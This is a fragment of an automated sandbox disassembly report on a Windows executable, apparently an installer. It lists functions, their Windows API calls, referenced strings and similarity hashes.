                                                                                                    • String ID: %H
                                                                                                    • API String ID: 1831053106-1959103961
                                                                                                    • Opcode ID: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                    • Instruction ID: 242bcfed98594cbdcf51f2854abe94a1ec69c13560e3a72339b9f4254961cc58
                                                                                                    • Opcode Fuzzy Hash: 613a86eb96bd964688756472f8397141eb38d2c4caf6b0936a0a8cf616000036
                                                                                                    • Instruction Fuzzy Hash: 62216570A04248AFEB15DFA6C841B9F7BB9DB49304F11806AF904A7682D778D940CB59
                                                                                                    APIs
                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00000000,0044B14C,?,%H,?,?), ref: 0044B11E
                                                                                                    • DrawTextW.USER32(?,?,00000000,?,?), ref: 0044B131
                                                                                                    • DrawTextA.USER32(?,00000000,00000000,?,?), ref: 0044B165
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: DrawText$ByteCharMultiWide
                                                                                                    • String ID: %H
                                                                                                    • API String ID: 65125430-1959103961
                                                                                                    • Opcode ID: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                    • Instruction ID: fec6fabf6d030a51aab30bc406273ff78954f96defe81b00f374268ef7e1f253
                                                                                                    • Opcode Fuzzy Hash: b9978a40832644be7eb99ff61e6ae739c3599586bb389d309c0d7579617ef2e1
                                                                                                    • Instruction Fuzzy Hash: 2A11CBB27046047FEB00DB6A9C91D6F77ECDB49750F10817BF504D72D0D6399E018669
                                                                                                    APIs
                                                                                                    • SHAutoComplete.SHLWAPI(00000000,00000001), ref: 0042EDC5
                                                                                                      • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                      • Part of subcall function 0042E394: SetErrorMode.KERNEL32(00008000), ref: 0042E39E
                                                                                                      • Part of subcall function 0042E394: LoadLibraryA.KERNEL32(00000000,00000000,0042E3E8,?,00000000,0042E406,?,00008000), ref: 0042E3CD
                                                                                                    • GetProcAddress.KERNEL32(00000000,SHAutoComplete), ref: 0042EDA8
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressAutoCompleteDirectoryErrorLibraryLoadModeProcSystem
                                                                                                    • String ID: SHAutoComplete$shlwapi.dll
                                                                                                    • API String ID: 395431579-1506664499
                                                                                                    • Opcode ID: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                    • Instruction ID: e807f919b0f5f47641bb36d66eaae5ab4e0d2818c3cb02d7dc2bc8906116ae4e
                                                                                                    • Opcode Fuzzy Hash: 42f9dcb05abbf77f41298dba7160eccf52289638d4fdae2cac913a0c4d077c72
                                                                                                    • Instruction Fuzzy Hash: 3311A330B00319BBD711EB62FD85B8E7BA8DB55704F90447BF40066291DBB8AE05C65D
                                                                                                    APIs
                                                                                                      • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                    • RegCloseKey.ADVAPI32(?,00455A7B,?,00000001,00000000), ref: 00455A6E
                                                                                                    Strings
                                                                                                    • SYSTEM\CurrentControlSet\Control\Session Manager, xrefs: 00455A1C
                                                                                                    • PendingFileRenameOperations, xrefs: 00455A40
                                                                                                    • PendingFileRenameOperations2, xrefs: 00455A4F
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpen
                                                                                                    • String ID: PendingFileRenameOperations$PendingFileRenameOperations2$SYSTEM\CurrentControlSet\Control\Session Manager
                                                                                                    • API String ID: 47109696-2115312317
                                                                                                    • Opcode ID: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                    • Instruction ID: e9356c19d9a7d2c1b22529064790e486fb2be540b5bf165494b3782c633fa2c0
                                                                                                    • Opcode Fuzzy Hash: 336a8554af3216e9fad4f98949cc8fac3f30a8fbf7097481dd1a9e766711aba3
                                                                                                    • Instruction Fuzzy Hash: A3F0F671304A08BFDB04D661DC62A3B739CE744725FB08167F800CB682EA7CBD04915C
                                                                                                    APIs
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472301
                                                                                                    • FindClose.KERNEL32(000000FF,0047232C,00472325,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 0047231F
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1), ref: 00472423
                                                                                                    • FindClose.KERNEL32(000000FF,0047244E,00472447,?,00000000,?,0049C1E0,00000000,00472515,?,00000000,?,00000000,?,004726E1,?), ref: 00472441
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 2066263336-0
                                                                                                    • Opcode ID: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                    • Instruction ID: ff38abb04fb96460afd2c3532f2e87b2ffc4f25b99c166b2ff4046d92e8ebf4f
                                                                                                    • Opcode Fuzzy Hash: 5852171562c0697583dfb39d2e83bd074d15792751f52c1309e6650eed3a72c0
                                                                                                    • Instruction Fuzzy Hash: 3EC14C3490424D9FCF11DFA5C981ADEBBB8FF49304F5080AAE808B3251D7789A46CF58
                                                                                                    APIs
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?,00000000), ref: 0047FD9E
                                                                                                    • FindClose.KERNEL32(000000FF,000000FF,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?,?), ref: 0047FDAB
                                                                                                    • FindNextFileA.KERNEL32(000000FF,?,00000000,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147), ref: 0047FEA0
                                                                                                    • FindClose.KERNEL32(000000FF,0047FECB,0047FEC4,?,?,?,?,00000000,0047FEF1,?,00000000,00000000,?,?,00481147,?), ref: 0047FEBE
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Find$CloseFileNext
                                                                                                    • String ID:
                                                                                                    • API String ID: 2066263336-0
                                                                                                    • Opcode ID: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                    • Instruction ID: 5570db9595827249690d4c596f970be035a6cb65fb6c4bc3b070d2a6e7e06d26
                                                                                                    • Opcode Fuzzy Hash: 56ee50c7cb7fa2545e62f1cc5d9b880787f4aaf8996287a3801f00069153f90f
                                                                                                    • Instruction Fuzzy Hash: 34512D71A006499FCB21DF65CC45ADEB7B8EB88319F1084BAA818A7351D7389F89CF54
                                                                                                    APIs
                                                                                                    • GetMenu.USER32(00000000), ref: 00421361
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 0042137E
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 004213B3
                                                                                                    • SetMenu.USER32(00000000,00000000), ref: 004213CF
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Menu
                                                                                                    • String ID:
                                                                                                    • API String ID: 3711407533-0
                                                                                                    • Opcode ID: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                    • Instruction ID: 68e231870b0c3442489bede8fdcf2aa1db34e154331db007d9f14f65c1163b63
                                                                                                    • Opcode Fuzzy Hash: 011238806e8749de4259267c2425fab43e1a23b2a7ed20fe69ece2c0c4e48eae
                                                                                                    • Instruction Fuzzy Hash: 4641AE3070425447EB20EA3AA9857AB36925B20308F4841BFFC40DF7A3CA7CDD45839D
                                                                                                    APIs
                                                                                                    • SendMessageA.USER32(?,?,?,?), ref: 00416B84
                                                                                                    • SetTextColor.GDI32(?,00000000), ref: 00416B9E
                                                                                                    • SetBkColor.GDI32(?,00000000), ref: 00416BB8
                                                                                                    • CallWindowProcA.USER32(?,?,?,?,?), ref: 00416BE0
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Color$CallMessageProcSendTextWindow
                                                                                                    • String ID:
                                                                                                    • API String ID: 601730667-0
                                                                                                    • Opcode ID: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                    • Instruction ID: 4ea48ea5c9b96bae81565ca4ce64eb356f32bd46963e120bc97d04dec40f2685
                                                                                                    • Opcode Fuzzy Hash: 072521f5090f240ceba025e33949739ce14f97652003165ca459573163e57643
                                                                                                    • Instruction Fuzzy Hash: BC115171705604AFD710EE6ECC84E8777ECEF49310715887EB959CB612C638F8418B69
                                                                                                    APIs
                                                                                                    • WaitForInputIdle.USER32(?,00000032), ref: 00454FA8
                                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000000FF), ref: 00454FCA
                                                                                                    • GetExitCodeProcess.KERNEL32(?,?), ref: 00454FD9
                                                                                                    • CloseHandle.KERNEL32(?,00455006,00454FFF,?,?,?,00000000,?,?,004551DB,?,?,?,00000044,00000000,00000000), ref: 00454FF9
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: Wait$CloseCodeExitHandleIdleInputMultipleObjectsProcess
                                                                                                    • String ID:
                                                                                                    • API String ID: 4071923889-0
                                                                                                    • Opcode ID: e6feda7d3358a80d2693463bb1cb51aaf78648cef31b4280cf5022ab190105ae
                                                                                                    • Instruction ID: ea90b2abd28d60bbe0c33bbe6d7a83e36ef454db8471bda6b5c19e9a906557d9
                                                                                                    • Opcode Fuzzy Hash: e6feda7d3358a80d2693463bb1cb51aaf78648cef31b4280cf5022ab190105ae
                                                                                                    • Instruction Fuzzy Hash: B9012D31A006097FEB1097AA8C02F6FBBECDF49764F610127F904D72C2C5788D409A78
                                                                                                    APIs
                                                                                                    • GetDC.USER32(00000000), ref: 0042311E
                                                                                                    • EnumFontsA.GDI32(00000000,00000000,00423068,00410460,00000000,?,?,00000000,?,00418FD3,00000000,?,?,?,00000001), ref: 00423131
                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00423139
                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 00423144
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CapsDeviceEnumFontsRelease
                                                                                                    • String ID:
                                                                                                    • API String ID: 2698912916-0
                                                                                                    • Opcode ID: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                    • Instruction ID: a9d24610abdaa6694e735d00c6d38f20457f2ac5f1468c421a1b182fb2ef8db9
                                                                                                    • Opcode Fuzzy Hash: ae3b46bdf4144dece9088701a44aa945a4d7eb571b2044da6dc5baa79edeb2ca
                                                                                                    • Instruction Fuzzy Hash: 8D01CC716042102AE700BF6A5C82B9B3AA49F01319F40027BF808AA3C6DA7E980547AE
                                                                                                    APIs
                                                                                                    • RtlInitializeCriticalSection.KERNEL32(0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019E2
                                                                                                    • RtlEnterCriticalSection.KERNEL32(0049B420,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 004019F5
                                                                                                    • LocalAlloc.KERNEL32(00000000,00000FF8,0049B420,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A1F
                                                                                                    • RtlLeaveCriticalSection.KERNEL32(0049B420,00401A89,00000000,00401A82,?,?,0040222E,0049B460,00000000,00000000,?,?,00401C49,00401C5E,00401DA2), ref: 00401A7C
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: CriticalSection$AllocEnterInitializeLeaveLocal
                                                                                                    • String ID:
                                                                                                    • API String ID: 730355536-0
                                                                                                    • Opcode ID: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                    • Instruction ID: 91310e2de28581c92a9b529d79901d52005bdf0b1253609ef7109df0d78d257f
                                                                                                    • Opcode Fuzzy Hash: 46a689739c098c0829933ff4921327776432a14e69d4c62b65241a59cfc7f4a2
                                                                                                    • Instruction Fuzzy Hash: D001A1706482409EE719AB69BA467253FD4D795B48F11803BF840A6BF3C77C4440EBAD
                                                                                                    APIs
                                                                                                      • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                    • FlushFileBuffers.KERNEL32(?), ref: 0045C499
                                                                                                    Strings
                                                                                                    • NumRecs range exceeded, xrefs: 0045C396
                                                                                                    • EndOffset range exceeded, xrefs: 0045C3CD
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: File$BuffersFlush
                                                                                                    • String ID: EndOffset range exceeded$NumRecs range exceeded
                                                                                                    • API String ID: 3593489403-659731555
                                                                                                    • Opcode ID: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                                    • Instruction ID: 69b4fe9c868b7cadc716880164946defc5db249b4b2908964217ac1dcc813941
                                                                                                    • Opcode Fuzzy Hash: 7579bb90891bfddca92618b6050c99dc039493a8a69e6275f659694612805aa2
                                                                                                    • Instruction Fuzzy Hash: 4F617334A002588FDB25DF25C891AD9B7B5AF49305F0084DAED88AB353D674AEC8CF54
                                                                                                    APIs
                                                                                                      • Part of subcall function 00403344: GetModuleHandleA.KERNEL32(00000000,00498BB6), ref: 0040334B
                                                                                                      • Part of subcall function 00403344: GetCommandLineA.KERNEL32(00000000,00498BB6), ref: 00403356
                                                                                                      • Part of subcall function 0040631C: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498BC0), ref: 00406322
                                                                                                      • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0040632F
                                                                                                      • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetSearchPathMode), ref: 00406345
                                                                                                      • Part of subcall function 0040631C: GetProcAddress.KERNEL32(00000000,SetProcessDEPPolicy), ref: 0040635B
                                                                                                      • Part of subcall function 0040631C: SetProcessDEPPolicy.KERNEL32(00000001,00000000,SetProcessDEPPolicy,00000000,SetSearchPathMode,kernel32.dll,?,00498BC0), ref: 00406366
                                                                                                      • Part of subcall function 004063C4: 6FB81CD0.COMCTL32(00498BC5), ref: 004063C4
                                                                                                      • Part of subcall function 00410764: GetCurrentThreadId.KERNEL32 ref: 004107B2
                                                                                                      • Part of subcall function 00419040: GetVersion.KERNEL32(00498BDE), ref: 00419040
                                                                                                      • Part of subcall function 0044F744: GetModuleHandleA.KERNEL32(user32.dll,NotifyWinEvent,00498BF2), ref: 0044F77F
                                                                                                      • Part of subcall function 0044F744: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 0044F785
                                                                                                      • Part of subcall function 0044FC10: GetVersionExA.KERNEL32(0049B790,00498BF7), ref: 0044FC1F
                                                                                                      • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 00453210
                                                                                                      • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453216
                                                                                                      • Part of subcall function 004531F0: GetModuleHandleA.KERNEL32(kernel32.dll,Wow64RevertWow64FsRedirection,00000000,kernel32.dll,Wow64DisableWow64FsRedirection,00000000,00453289,?,?,?,?,00000000,?,00498C06), ref: 0045322A
                                                                                                      • Part of subcall function 004531F0: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00453230
                                                                                                      • Part of subcall function 004570B4: GetProcAddress.KERNEL32(00000000,SHCreateItemFromParsingName), ref: 004570D8
                                                                                                      • Part of subcall function 004645F4: LoadLibraryA.KERNEL32(shell32.dll,SHPathPrepareForWriteA,00498C1A), ref: 00464603
                                                                                                      • Part of subcall function 004645F4: GetProcAddress.KERNEL32(00000000,shell32.dll), ref: 00464609
                                                                                                      • Part of subcall function 0046CDF0: GetProcAddress.KERNEL32(00000000,SHPathPrepareForWriteA), ref: 0046CE05
                                                                                                      • Part of subcall function 00478C20: GetModuleHandleA.KERNEL32(kernel32.dll,?,00498C24), ref: 00478C26
                                                                                                      • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerSetConditionMask), ref: 00478C33
                                                                                                      • Part of subcall function 00478C20: GetProcAddress.KERNEL32(00000000,VerifyVersionInfoW), ref: 00478C43
                                                                                                      • Part of subcall function 00483F88: GetProcAddress.KERNEL32(00000000,SHGetKnownFolderPath), ref: 00484077
                                                                                                      • Part of subcall function 00495BB4: RegisterClipboardFormatA.USER32(QueryCancelAutoPlay), ref: 00495BCD
                                                                                                    • SetErrorMode.KERNEL32(00000001,00000000,00498C6C), ref: 00498C3E
                                                                                                      • Part of subcall function 00498968: GetModuleHandleA.KERNEL32(user32.dll,DisableProcessWindowsGhosting,00498C48,00000001,00000000,00498C6C), ref: 00498972
                                                                                                      • Part of subcall function 00498968: GetProcAddress.KERNEL32(00000000,user32.dll), ref: 00498978
                                                                                                      • Part of subcall function 004244D4: SendMessageA.USER32(?,0000B020,00000000,?), ref: 004244F3
                                                                                                      • Part of subcall function 004242C4: SetWindowTextA.USER32(?,00000000), ref: 004242DC
                                                                                                    • ShowWindow.USER32(?,00000005,00000000,00498C6C), ref: 00498C9F
                                                                                                      • Part of subcall function 004825C8: SetActiveWindow.USER32(?), ref: 00482676
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: AddressProc$HandleModule$Window$Version$ActiveClipboardCommandCurrentErrorFormatLibraryLineLoadMessageModePolicyProcessRegisterSendShowTextThread
                                                                                                    • String ID: Setup
                                                                                                    • API String ID: 504348408-3839654196
                                                                                                    • Opcode ID: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                    • Instruction ID: b535e719d7157e93998cc10f536158ae488692691c8c4e2dacdcbf5c7207fd3e
                                                                                                    • Opcode Fuzzy Hash: 1594606edc507442c6549f9e4ebdc225aad6ad90dc9fc57b5479ce1c0ac5814d
                                                                                                    • Instruction Fuzzy Hash: 873104312446409FD601BBBBFD5392D3B94EF8A728B91447FF80496693DE3C68508A7E
                                                                                                    APIs
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DC3C
                                                                                                    • RegQueryValueExA.ADVAPI32(?,?,00000000,?,00000000,70000000,?,?,00000000,?,00000000,?,00000000,0042DD38), ref: 0042DCAC
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000002.00000002.2614385519.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                    • Associated: 00000002.00000002.2614357574.0000000000400000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614525563.0000000000499000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614555497.000000000049A000.00000008.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614596297.000000000049B000.00000004.00000001.01000000.00000004.sdmp
                                                                                                    • Associated: 00000002.00000002.2614683480.00000000004AB000.00000002.00000001.01000000.00000004.sdmp
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_2_2_400000_bzX2pV3Ybw.jbxd
                                                                                                    Similarity
                                                                                                    • API ID: QueryValue
                                                                                                    • String ID: $=H
                                                                                                    • API String ID: 3660427363-3538597426
